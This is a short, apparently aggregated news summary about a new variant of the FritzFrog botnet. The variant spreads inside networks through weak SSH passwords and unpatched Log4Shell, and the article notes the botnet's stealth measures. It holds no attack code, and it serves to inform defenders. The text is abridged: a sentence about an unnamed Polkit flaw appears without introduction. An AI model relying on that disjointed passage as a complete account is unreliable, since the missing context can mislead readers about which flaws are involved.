It's been more than two years since the critical vulnerability in Log4j was first unleashed unto this earth, yet attackers are still making good use of it, as many organizations remain unpatched.
Particularly, it seems, in deceptively secure areas of their networks.
Unlike most Log4Shell attacks, FritzFrog - a peer-to-peer, Golang-based botnet - doesn't target Internet-facing systems and services.
Its trick, rather, is to search for and spread through the same vulnerability in internal network assets that organizations are less likely to have patched.
Log4Shell is just one of FritzFrog's new tricks.
How FritzFrog Spreads Historically, FritzFrog likes to infect networks by brute-forcing Internet-facing servers with weak SSH passwords.
The new variant builds on this tactic by reading several system logs on compromised hosts, with the aim of identifying more potentially weak targets to spread to in a network.
In addition to weak passwords, nowadays it is also scanning for Log4Shell openings.
FritzFrog's Other New Tricks Improved network scanning and Log4Shell exploiting are just two of FritzFrog's latest upgrades.
Though two years have passed since its disclosure, this trivial-to-exploit flaw is likely widespread as Polkit is installed by default in most Linux distributions.
The FritzFrog developers have also given a good deal of thought to stealth.
These tricks, among others, have contributed to the botnet's 20,000-plus attacks against more than 1,500 victims since its first spotting in 2020.
This Cyber News was published on www.darkreading.com. Publication date: Thu, 01 Feb 2024 19:45:19 +0000